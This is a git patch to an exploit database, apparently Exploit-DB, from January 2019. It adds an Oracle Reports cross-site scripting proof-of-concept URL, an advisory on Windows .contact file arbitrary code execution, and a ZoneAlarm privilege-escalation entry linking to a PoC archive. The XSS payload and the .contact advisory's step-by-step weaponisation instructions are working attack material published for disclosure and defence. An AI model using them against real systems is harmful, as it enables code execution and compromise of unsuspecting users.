From fade9b8cd40ecc573184f20864dcf1e986559f02 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 18 Jan 2019 05:01:43 +0000 Subject: [PATCH] DB: 2019-01-18 3 changes to exploits/shellcodes Microsoft Windows CONTACT - Remote Code Execution Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting --- exploits/multiple/webapps/46187.txt | 11 +++++ exploits/windows/local/46188.txt | 68 +++++++++++++++++++++++++++++ exploits/windows/local/46189.txt | 17 ++++++++ files_exploits.csv | 3 ++ 4 files changed, 99 insertions(+) create mode 100644 exploits/multiple/webapps/46187.txt create mode 100644 exploits/windows/local/46188.txt create mode 100644 exploits/windows/local/46189.txt diff --git a/exploits/multiple/webapps/46187.txt b/exploits/multiple/webapps/46187.txt new file mode 100644 index 000000000..bd5b1ea1e --- /dev/null +++ b/exploits/multiple/webapps/46187.txt @@ -0,0 +1,11 @@ +# Exploit Title: [Cross-site Scripting (XSS)] +# Date: [2019-01-15] +# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company] +# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html] +# Version: [12.2.1.3] (REQUIRED) +# Tested on: [Windows 10] +# CVE : [CVE-2019-2413] + +POC: + +https:///reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E \ No newline at end of file diff --git a/exploits/windows/local/46188.txt b/exploits/windows/local/46188.txt new file mode 100644 index 000000000..6b35136df --- /dev/null +++ b/exploits/windows/local/46188.txt @@ -0,0 +1,68 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Microsoft .CONTACT File + +A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. +This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\. + + +[Vulnerability Type] +Insufficient UI Warning Arbitrary Code Execution + + +[Security Issue] +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. +User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. + +The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an +executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user. + +e.g. + +www.hyp3rlinx.altervista.com + +Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs. +Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys. + +The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory. +This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well. + + +[Exploit/POC] +Rename any executable file extension from ".exe" to ".com" to be like a valid web domain name. +Create a directory to house the executable file +Modify the contact file website link like ---> http.\\www..com +Contact website link now points at "dir .\ executable" ---> http.\\www..com +Compress the files using archive utility and place in webserver for download. + + +[POC Video URL] +https://vimeo.com/311759191 + + +[Disclosure Timeline] +Reported to ZDI 2018-11-30 +This exact same vulnerability exists and affects Microsoft Windows .VCF files sharing the same root cause and was publicly disclosed 2019-01-10. +https://www.zerodayinitiative.com/advisories/ZDI-19-013/ +Public disclosure : January 16, 2019 + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/46189.txt b/exploits/windows/local/46189.txt new file mode 100644 index 000000000..37c16891b --- /dev/null +++ b/exploits/windows/local/46189.txt @@ -0,0 +1,17 @@ +# Exploit Title: Check Point ZoneAlarm Local Privilege Escalation +# Date: 1/16/19 +# Exploit Author: Chris Anastasio +# Vendor Homepage: https://www.zonealarm.com/software/free-antivirus/ +# Software Link: Vulnerable Versions included in repo +# Version: +ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729 +Vsmon version: 15.3.58.17668 +Driver version: 15.1.29.17237 +Antivirus engine version: 8.8.1.110 +Antivirus signature DAT file version: 1297458144 +# Tested on: Windows 7/Windows 10 +# Vendor Disclosure: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk142952 + +POC: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46189.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 31451b6c7..eff597b7c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10225,6 +10225,8 @@ id,file,description,date,author,type,platform,port 46167,exploits/windows/local/46167.txt,"Microsoft Windows VCF - Remote Code Execution",2019-01-15,hyp3rlinx,local,windows, 46185,exploits/windows/local/46185.txt,"Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation",2019-01-16,"Google Security Research",local,windows, 46186,exploits/linux/local/46186.rb,"blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)",2019-01-16,Metasploit,local,linux, +46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows, +46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40664,3 +40666,4 @@ id,file,description,date,author,type,platform,port 46179,exploits/hardware/webapps/46179.txt,"GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal",2019-01-16,"Pasquale Turi",webapps,hardware,80 46180,exploits/hardware/webapps/46180.html,"Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset",2019-01-16,"Adithyan AK",webapps,hardware,80 46182,exploits/php/webapps/46182.py,"Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit",2019-01-16,"Larry W. Cashdollar",webapps,php,80 +46187,exploits/multiple/webapps/46187.txt,"Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting",2019-01-17,"Mohamed M.Fouad",webapps,multiple,443